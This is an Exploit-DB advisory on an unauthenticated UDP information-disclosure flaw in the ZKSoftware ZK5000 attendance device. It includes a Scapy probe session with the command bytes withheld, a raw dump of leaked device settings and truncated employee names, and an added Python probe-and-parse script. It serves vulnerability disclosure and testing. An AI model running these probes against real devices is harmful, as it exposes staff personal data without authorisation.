ZKSoftware 'ZK5000' - Remote Information Disclosure

EDB-ID:

33907

CVE:

N/A


Author:

fb1h2s

Type:

remote


Platform:

Multiple

Date:

2010-03-20


source: https://www.securityfocus.com/bid/39789/info

The ZKSoftware ZK5000 device is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 

Response to custom-made Scapy packets:
#####################################################################################################
fb1h2s@fb1h2s:~$ sudo scapy
[sudo] password for adminuser:
/var/lib/python-support/python2.5/scapy.py:3118: Warning: 'with' will become a reserved keyword in Python 2.6
/var/lib/python-support/python2.5/scapy.py:3120: Warning: 'with' will become a reserved keyword in Python 2.6
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump()
Welcome to Scapy (v1.1.1 / -)
>>> ip = IP(dst="192.168.*.*")      # target device address (redacted in the original)
>>> udp = UDP(sport=4371, dport=4370)
>>> payload = "Coustomcommands"     # placeholder for the device command bytes, which the advisory does not reproduce
>>> packet = ip/udp/payload
>>> sniff
<function sniff at 0x9f0333c>
>>> sr1(packet)
Begin emission:
Finished to send 1 packets.
You can pull essentially anything you want from the device.
BINGO :D
 
Below is a dump of the UDP communication with the hardware. The data leaks as a result of improper authentication: the device answers the request without verifying who sent it.
 
...........Q[...L.WU[.....f.[...Ver 6.21 Sep  4 2008.....[...~OS.....[...~OS=1...hv[...~ExtendFmt...f>[...~ExtendFmt=0...jW[...ExtendOPLog.....[...ExtendOPLog=...X.[...~Platform.....[...~Platform=ZEM500.E..Y[...H....Q[...... .[...WorkCode....r[...WorkCode=0....E[.................F[..............3....D[..............@[.............U.........d......
MMr.K.Sug........d...e......MMr. Sant.)......e...f......MMrs. Anu/@......f...g......MMr. Kris@@......g...h......MMr. Domian......h...i......MMrs. Sho`n......i...j......MMr. B. S~)......j...k......MMs. Bhag_n......k...l......MMs. NishYn......l...m......MMr. Moha.)......m...n......
MMr. ChanXn......n...o......MMrs. Ruk^n......o...p......MMr. Prad.g......p...q......MMr. Kuma\n......q...r......MMr. Dhan[n......r...s......MMr. NirmZn......s...t......MMs. Lali1@......t...u......MMs. Nave.)......u...v......MMs. Sudh.)......v...w......
MMs. Anit2@......w...x......MMs. Poon3@......x...y......MMrs. Gee=@......y...z......MMs. Vidh<@......z...{......MMrs. BanB@......{...|......MMrs. Man]n......|...}......MMr.G.ThiWn......}...~......MMs. Indi........~..........MMrs. Jot...................MMrs. Kav...................
MMr. Thiy...................MMr. Prak.8.................MMs. Love.8.................MMr. Sund.8.................MMr. Kart.8.................MMs. Koma.8.................MMr. Prad.8.................MMr. ........MaheB`.................MMr. RajkC`.................MMr. NataD`.................MMr. ManoE`.................MMr. Varu<`.................
MMr. Than@`.................MMr. Rich=`.................MMr. Prak>`.................MMrs.A.Us?`.................MMrs.B.KaA`.................MMs. Banu._.................MMr. Stal.@.................MMr. Chan.@.................MMr. DhanQn.................MMr. MukiRn.................MMrs. Satcn.................MMs. Gomabn.................MMr. Ramadn.................
MMrs. Geeen.................
Trimmed....
 
This vulnerability was checked and verified on the ZK5000 hardware model; other models and firmware versions are likely to be vulnerable as well.
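The following is an added example, not code from the original advisory or from the vendor, showing how a tester would script this check without Scapy: send one UDP datagram to port 4370 with the standard-library `socket` module and sift the reply for the firmware banner, `key=value` settings and user names that are visible in the dump above. The device command bytes are not reproduced on the page, so `payload` is a caller-supplied parameter; `SAMPLE_RESPONSE` is constructed from the printable fragments in the dump, with NUL bytes standing in for the undocumented binary framing, so the parsing runs offline.

```python
"""Probe a ZK-series device over UDP/4370 and sift the reply for leaked data.

Added example; not code from the original advisory. Assumptions:
  * the device answers a single UDP datagram sent to port 4370 (as the
    Scapy session in the advisory shows); the vendor command bytes are not
    given on the page, so the caller supplies `payload`;
  * the reply is a binary blob with printable settings ("key=value"), a
    version banner and user names embedded in it, as the dump shows.
"""
import re
import socket

ZK_DEVICE_PORT = 4370   # port the advisory sends to
ZK_SOURCE_PORT = 4371   # source port used in the advisory's Scapy session

# Settings come back as printable "key=value" pairs (keys may start with '~').
SETTING_RE = re.compile(rb"(~?[A-Za-z][A-Za-z0-9]*)=([\x20-\x7e]*)")
# Firmware banner seen in the dump: "Ver 6.21 Sep  4 2008".
VERSION_RE = re.compile(rb"Ver \d+(?:\.\d+)* [A-Za-z]{3} +\d{1,2} \d{4}")
# Enrolled-user names carry a courtesy title; the field is followed by
# opaque bytes, so stop at the first character that cannot be part of a name.
NAME_RE = re.compile(rb"(?:Mrs|Mr|Ms)\.\s?[A-Za-z][A-Za-z. ]*")
# Any run of printable ASCII, strings(1)-style, for manual review.
PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{4,}")

# Constructed sample reply: the printable fragments visible in the advisory's
# dump, joined with NUL bytes standing in for the undocumented binary framing.
# Not a real capture.
SAMPLE_RESPONSE = (
    b"\x00\x00Q[\x00\x00\x00Ver 6.21 Sep  4 2008\x00\x00\x00\x00"
    b"[\x00\x00\x00~OS\x00\x00\x00\x00[\x00\x00\x00~OS=1\x00\x00\x00"
    b"[\x00\x00\x00~ExtendFmt\x00\x00\x00f>[\x00\x00\x00~ExtendFmt=0\x00\x00\x00"
    b"[\x00\x00\x00ExtendOPLog=\x00\x00\x00[\x00\x00\x00~Platform=ZEM500\x00\x00\x00"
    b"[\x00\x00\x00WorkCode=0\x00\x00\x00"
    b"MMr. Kris@@\x00\x00\x00\x00\x00\x00g\x00\x00\x00h\x00\x00\x00\x00\x00\x00"
    b"MMrs. Sho`n\x00\x00\x00\x00\x00\x00i\x00\x00\x00j\x00\x00\x00\x00\x00\x00"
    b"MMr. B. S~)\x00\x00\x00\x00\x00\x00j\x00\x00\x00k\x00\x00\x00\x00\x00\x00"
    b"MMs. Bhag_n\x00\x00\x00"
)


def probe(host, payload, dport=ZK_DEVICE_PORT, sport=ZK_SOURCE_PORT, timeout=2.0):
    """Send one datagram to the device and return the raw reply, or None on timeout."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.bind(("", sport))
        sock.sendto(payload, (host, dport))
        try:
            data, _ = sock.recvfrom(65535)
        except socket.timeout:
            return None
    return data


def extract_version(blob):
    """Firmware banner, or None if the reply carries none."""
    m = VERSION_RE.search(blob)
    return m.group(0).decode("ascii") if m else None


def extract_settings(blob):
    """All printable key=value pairs in the reply (a later duplicate key wins)."""
    return {k.decode("ascii"): v.decode("ascii") for k, v in SETTING_RE.findall(blob)}


def extract_names(blob):
    """Titled user names, with trailing field padding ('.', ' ') stripped."""
    return [m.decode("ascii").rstrip(" .") for m in NAME_RE.findall(blob)]


def extract_strings(blob):
    """Every printable run of four or more bytes, for manual review."""
    return [s.decode("ascii") for s in PRINTABLE_RE.findall(blob)]


def summarize_leak(blob):
    """Collect everything an unauthenticated reply gives away."""
    return {
        "version": extract_version(blob),
        "settings": extract_settings(blob),
        "names": extract_names(blob),
        "strings": extract_strings(blob),
    }


def discloses_without_auth(blob):
    """The check a tester wants: does an unauthenticated request return config or user data?"""
    s = summarize_leak(blob)
    return bool(s["settings"] or s["names"] or s["version"])


if __name__ == "__main__":
    # Offline demonstration on the constructed sample. Against a real device:
    #   summarize_leak(probe("192.168.x.y", COMMAND_BYTES) or b"")
    for key, val in summarize_leak(SAMPLE_RESPONSE).items():
        print(key, val)
```

The parser is deliberately signature-based rather than a structural decode of the record format: the advisory does not document the framing, so the safe thing is to pull out only what is recognisably plaintext (banner, settings, titled names) and leave the rest to a `strings`-style pass.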